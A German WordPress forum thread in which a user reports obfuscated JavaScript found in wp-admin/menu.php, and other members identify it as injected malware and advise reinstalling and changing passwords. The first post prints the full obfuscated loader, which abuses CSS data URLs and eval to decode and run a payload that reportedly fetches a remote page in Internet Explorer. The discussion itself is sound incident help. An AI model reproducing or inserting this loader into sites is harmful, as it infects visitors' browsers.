Javascript in wp-admin/menu.php

  • Hallo liebe Community,
    ich hab mich heute gewundert, als ich etwas in den Theme-Editor ändern wollte. Als ich auf Okay geklickt habe, kam eine Fatal-Error (wenns so richtig ist ;) ) Da stand, dass es im wp-admin/menu.php sei, ab Zeile 477 und zwar folgendes:

    HTML
    <script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement('style');if(!isIE)style_node.innerHTML=selector+' {'+declaration+'}';document.getElementsByTagName('head')[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=='object')last_style_node.addRule(selector,declaration);}};createCSS('#c0','background:url(data:,eval)');var dul=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){var pcnp=r[i].cssRules||r[i].rules;for(var meh=0;meh<pcnp.length;meh++){var yf=pcnp.item?pcnp.item(meh):pcnp[meh];if(!yf.selectorText.match(/#c(\d+)/))continue;dul=yf.style.backgroundImage.match(/url\('?data\:[^,]*,([^')]+)'?\)/)[1];};} var dc='36/t,36/t'.split(',');xee=new Date(2010,11,3,2,21,4);var kdl='';ri=function(){return{e:eval}}().e;az=ri(dul);var tsh='';var sn='fro'+xee.getSeconds()+'arCode';sn=sn.replace(4,'mCh');dezr=String[sn];t=xee.getSeconds();for(var i=0;i<dc.length;i++){umct=az(dc[i]);dezr.call(umct);tsh+=dezr(umct);} az(tsh);</script>

    Jetzt frag mich mich, ob es irgendwie gefährlich ist. Ich habs natürlich entfernt, damit wieder alles einwandfrei funktioniert.

    PS: bin mir nicht sicher, ob es rein gehört :)

    Lg

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Fehlermeldung ist:

    Code
    Warning:  Cannot modify header information - headers already sent  by  (output started at  /var/www/xxx/html/xxxx/wp-admin/menu.php:447) in  /var/www/xxx/html/xxx/wp-admin/theme-editor.php on line 89

    Ich hab das entfernt, was ich grad gepostet hab =)

    Lg

  • Welche Version von WP hast du?
    Die wp-admin/menu.php von WP 3.0.4 enthält nicht diesen Code, schon gar nicht in der genannten Zeile.

    "Eine gut gestellte Frage ist schon halb beantwortet."

  • Ich habe mal eben nach

    PHP
    function createCSS

    in allen Dateien von WP 3.0.4 suchen lassen. Das kommt nirgendwo vor.

    Entweder pfuscht da ein Plugin rein (aber dann kann es nicht direkt in der Datei stehen) oder dein Blog wurde gehackt bzw. enthält Malware.

    "Eine gut gestellte Frage ist schon halb beantwortet."

  • Das wäre einfach blöd .. ;(
    Was kann ich dagegen machen ?
    Das ist ja erst grad eben aufgetreten, als ich die tag.php geändert habe.
    Edit: Und die Umlaute im Admin-Bereich werden wegen diesen Skript nicht richtig dargestellt.
    Lg

    Einmal editiert, zuletzt von Andruh90 (12. Januar 2011 um 19:36)

  • Foren-Suchfunktion: "gehackt"
    Ansonsten würde ich mindestens WP komplett neu hochladen und Passwörter ändern.

    "Eine gut gestellte Frage ist schon halb beantwortet."

  • Okay. Ich hab alles getan, was mir gesagt wurde ;)
    Hab nochmal mit dem Support vom Webhoster gesprochen, die meinten das Gleiche.

    Danke für die Hilfe.

    MfG

  • Ja, da wurdest du auch gehackt. Meinen Webspace hats auch erwischt. Der Scheiss mit dem createCSS(selector,declaration) war in vielen Dateien zu finden. Also Update der Original WP Daten ist in jedem Fall empfehlenswert!

    Mich würde mal interessieren, ob jemand weisst, was der Code macht? Man kann es als normal Sterblicher nicht wirklich erkennen, da es nochmal verschlüsselt wurde.

  • Noch ein Hinweis von einem Kollegen, der den Server bereinigt hat:

    Ja stimmt die "menu" Dateien sind betroffen, aber kannst ihm ja bei Bedarf ausrichten, das auch sämtliche "index", "header", "footer", "main"... betroffen sind. Insbesondere auch die in den Theme und Plugin Verzeichnissen. Ein WP Update spart diese Bereiche ja gewöhnlich aus.

  • Hallo,

    ich habe - leider - das gleiche Problem. Wie kann man das Ganze schnell beheben, ohne die einzelnen Dateien neu installieren oder kopieren zu müssen?
    Also irgendwie scheint diese "Erweiterung" eine Seite anzusteuern und von dort etwas zu laden. Aber nur im Internet Explorer, nicht mit Firefox. Die angesteuerte Seite beginnt mit "http://af2t....", der IE8 muss dann aber beendet werden.
    Kann man sich gegen so etwas schützen? Nutzt ein kompliziertes Passwort beim Webserver etwas oder hat das damit gar nichts zu tun? Schließlich wurden ja Dateien verändert? Oder muss der Web-Hoster seine Sicherheit erhöhen?

    Vielen Dank für einen Tip im Voraus!

    Grüße
    Michael

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!